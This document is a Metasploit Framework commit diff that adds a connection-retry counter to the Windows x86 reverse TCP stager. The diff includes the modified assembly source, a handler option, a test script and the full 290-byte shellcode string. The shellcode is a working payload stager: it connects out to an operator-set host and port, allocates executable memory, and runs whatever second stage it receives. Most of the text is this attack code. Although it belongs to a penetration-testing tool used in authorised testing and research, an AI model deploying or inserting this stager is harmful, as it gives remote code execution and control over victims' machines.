Fixes #342. Set ReverseConnectRetries to a value between 1 and 255 (default is 5). On failure it will ExitProcess (still better than a cpu spin)

git-svn-id: file:///home/svn/framework3/trunk@7217 4d416f70-5f16-0410-b530-b9f4589650da

external/source/metsvc/test.rb

@@ -7,11 +7,11 @@ require 'rex'
 
 require 'rex/post/meterpreter'
 
-ip   = ARGV[0]
-port = ARGV[1]
+ip   = ARGV.shift() || exit
+port = ARGV.shift() || 31337
 
 if (ip == nil || port == nil)
-  puts "Syntax: test.rb <ip> <port>\n"
+  puts "Syntax: test.rb <ip> [port]\n"
   exit
 end
 

external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm

@@ -34,12 +34,29 @@ reverse_tcp:
   push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
   call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
   xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
-  
+
+set_address:
+  push byte 0x05         ; retry counter
   push 0x0100007F        ; host 127.0.0.1
   push 0x5C110002        ; family AF_INET and port 4444
   mov esi, esp           ; save pointer to sockaddr struct
+  
+try_connect:
   push byte 16           ; length of the sockaddr struct
   push esi               ; pointer to the sockaddr struct
   push edi               ; the socket
   push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
   call ebp               ; connect( s, &sockaddr, 16 );
+
+  test eax,eax           ; non-zero means a failure
+  jz short connected
+
+handle_failure:
+  dec dword [esi+8]
+  jnz short try_connect
+
+failure:
+  push 0x56A2B5F0        ; hardcoded to exitprocess for size
+  call ebp
+
+connected:

lib/msf/core/handler/reverse_tcp.rb

@@ -44,6 +44,13 @@ module ReverseTcp
 				Opt::LPORT(4444)
 			], Msf::Handler::ReverseTcp)
 
+		# XXX: Not supported by all modules
+		register_advanced_options(
+			[
+				OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ])
+			], Msf::Handler::ReverseTcp)
+
+			
 		self.conn_threads = []
 	end
 

modules/payloads/stagers/windows/reverse_tcp.rb

@@ -33,9 +33,9 @@ module Metasploit3
 			'Stager'        =>
 				{
 					'RequiresMidstager' => false,
-					'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], },
+					'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] },
 	 				'Payload' =>  
-						# Length: 272 bytes
+						# Length: 290 bytes
 						"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
 						"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
 						"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
@@ -48,15 +48,17 @@ module Metasploit3
 						"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
 						"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
 						"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
-						"\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10" +
-						"\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68" +
-						"\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56" +
-						"\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57" +
-						"\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
-
-
+						"\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6" +
+						"\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF" +
+						"\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56" +
+						"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
+						"\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
+						"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
+						"\xEC\xC3"
 				}
 			))
+
+		
 	end
 
 end